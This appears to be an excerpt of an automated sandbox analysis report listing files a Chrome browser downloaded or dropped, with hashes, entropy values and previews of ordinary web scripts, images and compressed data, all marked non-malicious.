                                                                                                                                            Preview:...........iw.8.(.....n....dg...M....l.'.N.}}h...H....8.....+E9.g.g.{&...A.K..T.j..........r#.Fy1K.4.6.S.@V)..:...QrV..S..?......^..../...o....E6....<)6..D&...4........*.j-...j.Z=....`...n(..j0I...<.....\..fG..s.^..(YL.7E>..O..W...e..V....\......E>;(..X..|7K.....e:Pq.8.L.:.....U^.'.,L..b...*.!....$..u...G<..<).w...o..j...1.dxU.jQd.E;-_.Y.Y.$...n...:_N..6 .ER.....BfC.._..t...&O.p.._.}........JdQ]...Yy}..|.....G...|Z.a.......1rJ...z$.:.L]O..y^Tel@(.B..*..-D.l...4..e.yQ..(..^...o..xk.?...%.M....om.I.....I..!/.{...,4..A....d.....Q.f$.moO...89...... =>..+...J..f..nmM!.....0..Y.....u&..%t`0...%.SXR-.bo..}oA...M.W..t~+...I..j....h..,....m.T.J.e..RB...^..b.u.ql.7u..y_.-2..li......`.`K+..1h.2...S....F.:.....M....*t....B.".;u.u.T.g.t...*.@..[-.Q.{......b..P..<...TL..2...K%.e6p:....]S.`Q..S..G..].#Ur..v#x...OBUl...M.N.i.....Tv....8k,2M.^."..ec..i>..Z...a..a.8...{_\4.,d9.33k...y...+U..vU..u..]N.# ~..bk+[L...$.)UlO.^y..^.;...<R...a..?..g.?..
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1345)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1710
                                                                                                                                            Entropy (8bit):5.184436449759259
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE43NOX+1NVmskCksjszesPjqkAcGO/sK:Q1O1NVm3vzesPh3d/5
                                                                                                                                            MD5:C1F19D2EC2656C16DEDCF9AC7EE5A18A
                                                                                                                                            SHA1:CFB85817A27DFE2B0B638077F48AC3FA1FEAE9CD
                                                                                                                                            SHA-256:5C5C1E7A7B1B6221E631ECE207F06B85A2E434C79DF5F9D8FCF111116F7E76B9
                                                                                                                                            SHA-512:E683F2559B7CECD253F9808C9A95622EB7D2C9A7BEE22B37C273582E4F9EEEDDC4C45B85A8E026A229F3F9A7AB2801FC820FA281ECAA9950834AD35E505EF7D4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c51870eb-2e2d-5bf1-aff3-34af23915c6e")}catch(e){}}();.import{r as l}from"./index-D6da9p6-.js";function o({title:a,titleId:e,...r},t){return l.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:t,"aria-labelledby":e},r),a?l.createElement("title",{id:e},a):null,l.createElement("path",{fillRule:"evenodd",d:"M9 4.5a.75.75 0 0 1 .721.544l.813 2.846a3.75 3.75 0 0 0 2.576 2.576l2.846.813a.75.75 0 0 1 0 1.442l-2.846.813a3.75 3.75 0 0 0-2.576 2.576l-.813 2.846a.75.75 0 0 1-1.442 0l-.813-2.846a3.75 3.75 0 0 0-2.576-2.576l-2.846-.813a.75.75 0 0 1 0-1.442l2.846-.813A3.75 3.75 0 0 0 7.466 7.89l.813-2.846A.75.75 0 0 1 9 4.5ZM18 1.5a.75.75 0 0 1 .728.568l.258 1.036c.236.94.97 1.674 1.91 1.91l1
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:PNG image data, 800 x 800, 8-bit colormap, non-interlaced
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9057
                                                                                                                                            Entropy (8bit):7.781669999936486
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:J1RtRLbbX/Xqmq3wOlKuuujYO58hjtG2tquV8/mg:Jx9HCx31l8O58G2IAUmg
                                                                                                                                            MD5:C7792C5C3D6C1AFEE46A35B3B2BC8A6B
                                                                                                                                            SHA1:8F64FA0B0B72B9126F27AEF1EEFEB621D9850D84
                                                                                                                                            SHA-256:164545DB1ABCD383DBAAD6E02E77952BD7181036C15A05CE0CBF4EFAAABEE4F1
                                                                                                                                            SHA-512:03C1FD57481637E735A0765CFD500BF1F7D8280AAC4D93A573CEB0A045A6F876903A148A4AB28CAD9675B4699241136751BCADCA791FB9AB1124C7154A054F38
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.PNG........IHDR... ... .......Z...=PLTE....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................X.*.. .IDATx.....9..a..M...e..vc.9..03.....3.9.0..\fff...>R.;93w&.K....t.M[.}..S..................................................................................................................................................................................................................................R...?....ze..\..we...E...iL~.......m...5.gM.1....[.3Fe..'...B..~....^O
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (4665)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):7148
                                                                                                                                            Entropy (8bit):5.265109224869054
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:skOa6YVlWhBNF9fhFOnuttP/F3b8uXX85DH:zdWhTr5FqgQEs5
                                                                                                                                            MD5:6DE0520A7B05F44D3D37356B2CAE694A
                                                                                                                                            SHA1:364D51B1DECBE758E8EAE73BACE094CDB14AA16B
                                                                                                                                            SHA-256:D456BDB126C069316781093BA369B1ED7BA836DB0795DBE0E658E4D34DD572A2
                                                                                                                                            SHA-512:A398CA6B73318B58E540DF700F0BA30AB1BE202FC9D9D7FE54387D9AA4C7BCE5AC869F9EF1BDB7EE6602026E41908624545CD1E18DEA44FF7B0142F94C53551B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/keyboard-CaEu2o0u.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b4c770d-59bf-5be1-ab78-6cf4d19e2599")}catch(e){}}();.import{r as a,e as j,R as S}from"./index-D6da9p6-.js";var R=Object.defineProperty,P=(e,t,n)=>t in e?R(e,t,{enumerable:!0,configurable:!0,writable:!0,value:n}):e[t]=n,w=(e,t,n)=>(P(e,typeof t!="symbol"?t+"":t,n),n);let x=class{constructor(){w(this,"current",this.detect()),w(this,"handoffState","pending"),w(this,"currentId",0)}set(t){this.current!==t&&(this.handoffState="pending",this.currentId=0,this.current=t)}reset(){this.set(this.detect())}nextId(){return++this.currentId}get isServer(){return this.current==="server"}get isClient(){return this.current==="client"}detect(){return typeof window>"u"||typeof document>"u"?"server":"client"}handoff(){this.handoffState==="pending"&&(this.handoffState="complete")}get isHandoffComplete
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 113769
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):35170
                                                                                                                                            Entropy (8bit):7.993096534744333
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:768:K+LvEzA9nny7u0zF35Hm4ngomu6yeLDKDnccqmcmHvVVPCLVf:ny7f5GpuheL4htv3Pkf
                                                                                                                                            MD5:171A4DD9400708B88724B57D62B24A6A
                                                                                                                                            SHA1:9C6F1303B8F02FCE18D20EC9CADA11D38D0C4B37
                                                                                                                                            SHA-256:EA00750636C11DBD4FA3ACB1B3CDCBAE3EFA43F6B6C3753444B6D6A242AE9336
                                                                                                                                            SHA-512:5B13B63912B34E3EEEDD8DA5953B869A83DF82FFD2A8D737AA81DC984F1811800A534F340C48041DA803C25B6B8F5605EA8D003B6A09A1874408F95A710F5126
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_cc2c59f5ef2c09e14b08.js
                                                                                                                                            Preview:...........kC.H.0......e....0.pX..Iv3..\f..0YY.m..e$.K..o...j..g.3.lpW.......[..Y.?k.Y.......8~.a..../_.;]{.............v...0..q.Dk.w...h-....Z<..l.fA..k3.7..dm....b..-...(,.$...4...f...e...AV..z.mA....O.9........k..h-.......<Z[.GQ.v3....Oq..y:..(..k.$_...._..h-...q..S.ck.=.T......Sq@.:.A.c.(....SDq..Ac.t..m.$Lc....Z...K...O<....f9..p...0Z..3.<...$YK.x.F......v....nm..s$...&..dQ4.......n-.-.......E.XD..-5~...f.....t...-_.....fsg...8kZ..|.{{....p+Lg.t9I..P./ap......o9Wx.._{....k..,...............................7.|..t...Ax.7..b..v..v.m-...~v...:....r..._........,...A........z.....|..t.. [.C.....{...~..c......ua...~.v<.I..P#._{{}._.......Km...eR....u?GY..h..}..gAv...<.l.Z...#.....:P?Q..."..........,.D...I<._.'..-..=..;.>.C_..#.....D[0.Y..*...M.....{.YT,...x..SQ/......N<`...|._.k....0)......+.Z..4...M. ...i...`.ml..-X.E.....d.. .}.e4.{6hz^..}....@....W.1...d8...>.@.....(.'[..`..A..?...yL.|..QTF...-.='S@.Q.sM.`...}.t..$..y^..0J.kC.S...U.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (3232)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3599
                                                                                                                                            Entropy (8bit):5.478761913789035
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:QI6rPxXkUJ9PpF3UZICMXLnFI6bJq1owE:jckUTPpWC20q1O
                                                                                                                                            MD5:2BD4E61C99666C3C86336852324D1413
                                                                                                                                            SHA1:D50EAB362A8B1DB71C324426AAFE5B8B7FB826EB
                                                                                                                                            SHA-256:5229B3040D227A4AF2B81FBC82F5BD1289301FF26A1F2BA13D010854AF372E2D
                                                                                                                                            SHA-512:1C1C96F63F5822CF4BB2A7658CDFF85F6017DCB852D1F3BF6FF7CB257422A7FFABD0EDB4D11B5DA7D38E394D3F6A91F95DDF3F5791778E48EF522FCD7FDE2DB6
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/use-is-mounted-BaHv16bB.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="5b24908e-af64-5771-8367-1c4890fd594e")}catch(e){}}();.import{e as h,u as b,b as x,l as F}from"./keyboard-CaEu2o0u.js";import{r as p}from"./index-D6da9p6-.js";function f(e){return h.isServer?null:e instanceof Node?e.ownerDocument:e!=null&&e.hasOwnProperty("current")&&e.current instanceof Node?e.current.ownerDocument:document}let d=["[contentEditable=true]","[tabindex]","a[href]","area[href]","button:not([disabled])","iframe","input:not([disabled])","select:not([disabled])","textarea:not([disabled])"].map(e=>`${e}:not([tabindex='-1'])`).join(",");var w=(e=>(e[e.First=1]="First",e[e.Previous=2]="Previous",e[e.Next=4]="Next",e[e.Last=8]="Last",e[e.WrapAround=16]="WrapAround",e[e.NoScroll=32]="NoScroll",e))(w||{}),y=(e=>(e[e.Error=0]="Error",e[e.Overflow=1]="Overflow",e[e.Success=2]="
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 90677
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):32811
                                                                                                                                            Entropy (8bit):7.992877953733209
                                                                                                                                            Encrypted:true
                                                                                                                                            SSDEEP:768:fDPYSdMWwCyzH8REcKPN/8p0x7UQzlRMXv1FevViDAqA:a8REcsUp0xUQzc/8VCAV
                                                                                                                                            MD5:2E287EB418940084B921590C6E672C9E
                                                                                                                                            SHA1:1FC75A9DAA054EF88AAEA181F3A9B4CBA2B6B6E1
                                                                                                                                            SHA-256:6C2C58DAAE76131A00D1BFEE20852F372CF594BE7F4A8848ACC42F8BF72C1BBD
                                                                                                                                            SHA-512:A77F69571B0F04F4A2354D9E18E41EF86F22274EAED20C02215B632BFEF09C6543A83591E9DB3F2B4036A9684BFF666EB6A7B253BA18893500E9CD541AB752A0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........iw.8.?.~>....%."9K'R...q:.fw.,.n_.Z.l.eRMR^b.O...A.N...yq.t,b!.....BU....4kM.Lr..I.]DE.&..TF..K.J.9.7.$....(..'?....f...tG...?y8~0..;..w;[....;.u........D.......N:W.d........E..eR...q..sJG.O.Z,....l......~.........'.d.......n.N..@.../....l'...".J3Y..n3Y...o..T...P0..j..-.....v.m7T.LM. .....Ev.7...IC.q..[.t>nj.e..OE<m...l)^.K.......8:M.&.]zz*..j.X..K........'3..Tk....Z.2.GQ6..Fi._.|v.Bf.W?...T.]:j(.%F.)..t_^........8.:..DN..8....B.>|<..~..|H.x.q.=-.f.~..{.z..&t...e.LfE,.;.d...n.....2..FH. .Y,.J...EC.cj. .F......o.....\...&\.J..fJiJ.S..4.5..NM]m.....Q.....e.O..iSs'........'Z..6A(Y.8..eQ.....2..I.?...;dS..I...D..@./7t.:z.......c...dF..B.......9...8)..h.........<.I...2.\FY+.=S.8...$Qv...<..IL.x".w9_..3.."-nfR.(..WDN..L.....z..I8.E..Ub......d..M.....sq.N........p.*.lX...A]3Y....j...%.`N..G.v..6.m.KH.M......Z..a2.N.....4....,u.O.vWM...=d..J.r`..b.....N.hzp..C..?.. ......:..M6............;.w.."B.^.ZP.N.:.[..(:...(.y.)q...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):658
                                                                                                                                            Entropy (8bit):5.543898320885979
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS+YvBLNwHpaxvuxPUQr9SULXllMHSbl2OQq1vB+:UgqHHVvCaRuS+IBLNkaxAPxr9SillMHX
                                                                                                                                            MD5:37B30F1E552B6D056A3D09FEFBDDE385
                                                                                                                                            SHA1:4EDC7303D1E56C87AB61965CBAD9C1EA3CD64DA5
                                                                                                                                            SHA-256:DE693D0C5DDDF38D08D5FEF6BF00F01C37D8A685EF937574C9776BFED48A7887
                                                                                                                                            SHA-512:597221DC1448027DF64ED7D71301EAEC2D0BEC61354F5C6C5E9BCBB77A24DA0BEDBD407F7F8A3150C85C093FB4EBA39FCF9CA6BAB409371C4C8F2681460F5677
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="c4ae2679-7619-5e59-be5a-1ac21a6e650e")}catch(e){}}();.import{j as s}from"./jsx-runtime-BjG_zV1W.js";import{c as x}from"./index-x2da_zcv.js";const e="px-4 sm:px-6",n="mx-auto w-full max-w-6xl",i=({as:a="div",className:o,style:t={},children:m,ref:r})=>s.jsx(a,{className:x(e,o),style:t,ref:r,children:s.jsx("div",{className:n,children:m})});export{i as B};.//# sourceMappingURL=index-BxYGUTX4.js.map..//# debugId=c4ae2679-7619-5e59-be5a-1ac21a6e650e.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (38752)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):93065
                                                                                                                                            Entropy (8bit):5.182415079046025
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:gOZ0ptDYb251aRoM7dxBKikcHpOPM9BW7PJGu8ryMUsFg4/:gpxFmxDIPwRu4/
                                                                                                                                            MD5:824BEB891744DB98CCBD3A456E59E0F7
                                                                                                                                            SHA1:57082A005D743EC4A7F928A928BD7BD561078C7C
                                                                                                                                            SHA-256:173460E89E6A7244218BADAE2016F65C48A3EAE9D400802273EECA18B07336F1
                                                                                                                                            SHA-512:6C19E304AF16AE43504A44EB60C542526D0D8F635E4F57AB557E93999AD608BE99C25354898EF4826DEFE63F8BA72E4D09C5EAC445EFBDE4587534CA202958E2
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||(window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.loaded&&window.twttr.widgets.load&&window.twttr.widgets.load(),window.__twttr&&window.__twttr.widgets&&window.__twttr.widgets.init||function(t){function e(e){for(var n,i,o=e[0],s=e[1],a=0,c=[];a<o.length;a++)i=o[a],r[i]&&c.push(r[i][0]),r[i]=0;for(n in s)Object.prototype.hasOwnProperty.call(s,n)&&(t[n]=s[n]);for(u&&u(e);c.length;)c.shift()()}var n={},r={0:0};function i(e){if(n[e])return n[e].exports;var r=n[e]={i:e,l:!1,exports:{}};return t[e].call(r.exports,r,r.exports,i),r.l=!0,r.exports}i.e=function(t){var e=[],n=r[t];if(0!==n)if(n)e.push(n[2]);else{var o=new Promise(function(e,i){n=r[t]=[e,i]});e.push(n[2]=o);var s,a=document.getElementsByTagName("head")[0],u=document.createElement("script");u.charset="utf-8",u.timeout=120,i.nc&&u.setAttribute("nonce",i.nc),u.src=function(t){return i.p+"js/"+({1:"dm_button
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (17968)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):84340
                                                                                                                                            Entropy (8bit):5.2905589892461675
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:p4yGNPSHxyJscvHPiYlKvB4dLfMCeuqTzzMRcALoPxZKpnFyVC3L:6yGdSHxUaYlKWxfHqTzzIiZKpD
                                                                                                                                            MD5:4BEEBE87EFE3853BCD7EC9CEA3C3D472
                                                                                                                                            SHA1:3D139C39CA7E1FAFBF9769E8C8A2EE496C009BBE
                                                                                                                                            SHA-256:09AA83676EBCC3EBD5E2DFB2C04F7CE6A87E507C7D2006DFE822F7A2BD9B2C57
                                                                                                                                            SHA-512:50350B962C3A8DDE345BA7BDD5F49B397E5CE35D3ECB455BFFBA5C9A2D9CE91031D87C82330E818352108C9CE1BF688B90007D84D39BDCDCD95D1BA8AE4BE09F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/performance-dfU_ZKaW.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dcfeed40-a5d5-514d-b4d9-80bf1ea599a5")}catch(e){}}();.import{j as se}from"./jsx-runtime-BjG_zV1W.js";import{r as Jt,g as Ts}from"./index-D6da9p6-.js";import{w as Pt,x as vs,b as le,D as Qe,l as f,y as rt,G as R,C as bs,k,z as In,A as W,B as tn,E as ht,F as oe,H as Sr,r as at,d as gt,n as Is,I as yr,e as F,f as U,J as S,K as $t,a as T,u as nt,T as Tr,s as b,L as fe,M as yt,N as en,O as nn,P as O,Q as ie,R as Rs,U as kt,V as ws,W as Rn,X as Ns,Y as vr,m as x,Z as Zt,S as J,_ as As,q as Tt,$ as br,a0 as wn,a1 as ks,a2 as Cs,a3 as Os,a4 as xs,a5 as rn,a6 as sn,a7 as Pe,a8 as Ps,a9 as $s,aa as Ds,ab as Nn,ac as on,ad as An,p as Fs,ae as an,af as Ms,ag as $e,ah as Ir,ai as kn,aj as cn,ak as et,t as ot,al as Cn,am as Rr,an as wr,ao as Nr,ap as De,aq as Ar,ar as Ls,as as Fe,at as ae,c as
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (24575)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):274871
                                                                                                                                            Entropy (8bit):5.375981936262279
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:orSkYqkvU7zQBPgJJakY7ilLqWwKG/0mY5I6MEVr318jYD9vDjUCven6L1a00r:oGkYd0QBY+kY764KG/45I6EA5Xf5u
                                                                                                                                            MD5:00CFEC97320F51DD994C4319A39070EB
                                                                                                                                            SHA1:CBA05E3FB79D0DC5A7CF3D29BCF051F65FFC0204
                                                                                                                                            SHA-256:A83CF211D4194DEC117091851DBEE2CBEA88B05D280C6E7F346A054C92E2FB8D
                                                                                                                                            SHA-512:AA8441D00F5AF41D29AFED8FA64C40C9421E11FBECB25CE81F00AF61D15A599C465C4A5DAF002F803DE18EE19C7843F9F5E8D3519534DD9FCDD81E8C8EB0074E
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="988d032a-e031-5042-b7d4-6b13b4ed5582")}catch(e){}}();.import{j as ns}from"./jsx-runtime-BjG_zV1W.js";import{c as me,r as U,J as uy,E as Gl,K as oy,y as cy,C as fy,L as dy,M as hy,P as my,g as py,a as yy}from"./index-D6da9p6-.js";import{r as Ji,d as gy}from"./dayjs.min-B8CfgAhU.js";import{i as vy,p as dc,_ as as,s as Bn,a as Sy,b as _y,c as by,d as Ey,e as My,f as wy,g as Ry,h as Ty,u as Ay,j as Oy,S as Dy,k as xy,l as Cy,m as zy,n as gd,o as ky,q as Ny,r as Uy,t as Ly}from"./performance-dfU_ZKaW.js";import{G as Zs,a as Ie,d as vd,b as hc,e as Hy,f as By,s as mc,S as qy,l as rt,c as Sd,h as _d,i as jy,j as Yy,n as bd,k as Xy,m as Gy,r as pc,o as Vy,u as Qy,p as Iy,q as Zy,t as Ky,v as Jy,g as Fy}from"./AppGlobals-2Br-8bZs.js";import{i as Ks}from"./i18next-BV1g0mjb.js";import{g as
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1313)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1680
                                                                                                                                            Entropy (8bit):5.360877834847203
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEgNwgiX+114GLlgjGHFhKiX+1PhpjCqM4:QXO114Cl+MhbO1Php7
                                                                                                                                            MD5:2070CB916AB5649CBFE3198C08EB7A82
                                                                                                                                            SHA1:DCD44F78294B70278B5A522ADC94EB5FC3DC9176
                                                                                                                                            SHA-256:14AB1812CDA7D000C3D536FD51EF671FA98C3A9145D6B34DC5732CD6F1D071C0
                                                                                                                                            SHA-512:2B80ACBC72392BAB69782D34142D606B8A9D4819221966691A8AF9A2869AD93CF03B9A3908685C5CC37407F5897FC5AFA1156996B548B102C5312B8D5E123FD5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ab4befe2-5cea-54a4-94d2-c6fbc0e5c0d1")}catch(e){}}();.import{r as e}from"./index-D6da9p6-.js";function n({title:a,titleId:r,...t},l){return e.createElement("svg",Object.assign({xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 24 24",fill:"currentColor","aria-hidden":"true","data-slot":"icon",ref:l,"aria-labelledby":r},t),a?e.createElement("title",{id:r},a):null,e.createElement("path",{d:"m11.645 20.91-.007-.003-.022-.012a15.247 15.247 0 0 1-.383-.218 25.18 25.18 0 0 1-4.244-3.17C4.688 15.36 2.25 12.174 2.25 8.25 2.25 5.322 4.714 3 7.688 3A5.5 5.5 0 0 1 12 5.052 5.5 5.5 0 0 1 16.313 3c2.973 0 5.437 2.322 5.437 5.25 0 3.925-2.438 7.111-4.739 9.256a25.175 25.175 0 0 1-4.244 3.17 15.247 15.247 0 0 1-.383.219l-.022.012-.007.004-.003.001a.752.752 0 0 1-.704 0l-.003-.001Z"}))}const d=e.f
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1531)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1900
                                                                                                                                            Entropy (8bit):5.516430742609563
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSe3NCad0YDzdcxRN5RriZjl24T0+QHLmMNHEBbuR3nTRPYRkGgGor:JWkEaN1dh96NjiZjl24T0tRYAnZoiz
                                                                                                                                            MD5:CD7E27F71F3C5A260C3C32664FD6758D
                                                                                                                                            SHA1:D91BED8C840C7DCEEFE8070A5A87EA71FF1763AE
                                                                                                                                            SHA-256:6F930BFF7C3E52B74B530DDC7F3B27C9417084B7787222709FCD09CAE95509E0
                                                                                                                                            SHA-512:561D610C9E20EA6845BF33499B1B3521E0974E4B49C672084B8DA3040F4C15D3EAD7617E0704E6E958E927F5461264E10B792B891262D3141D75EF7FC3D37B48
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9e5ad2d0-04cf-5456-a989-f5bdd78dc911")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{t as s}from"./i18next-BV1g0mjb.js";import{T as t}from"./index-BdpAPpdN.js";const a=({className:r})=>e.jsx("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",className:r,viewBox:"0 0 30 30",children:e.jsx("path",{fill:"#0B0D2A",d:"M25.692 13.168H3.866c-.556 0-1.01-.458-1.01-1.017V10.6c0-1.755 1.414-3.178 3.157-3.178H23.52c1.743 0 3.157 1.423 3.157 3.177v1.55a.98.98 0 0 1-.985 1.018ZM21.092 5.745H8.462a1.044 1.044 0 0 1-1.036-1.042C7.426 2.11 9.523 0 12.099 0h5.356c2.576 0 4.673 2.11 4.673 4.703 0 .584-.455 1.042-1.036 1.042ZM26.702 14.845H2.855C1.288 14.845 0 16.142 0 17.718c0 1.576 1.288 2.872 2.855 2.872h8.462c.303-1.627 1.718-2.872 3.436-2.872a3.532 3.532 0 0 1 3.46 2.8
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):673
                                                                                                                                            Entropy (8bit):7.6596900876595075
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (3856), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):3856
                                                                                                                                            Entropy (8bit):5.521495563748184
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:DvmyUca5UcWA5a82wJuL5v5Ritv5oGiZv5JWVYCMyM3/ZQEgK:DyT5atGuNv52v5av5SrcZHv
                                                                                                                                            MD5:222D8A0D8D3873EAA1C9E76285831876
                                                                                                                                            SHA1:1C58667E8F6919A9E604747D8F9406F88F5832F4
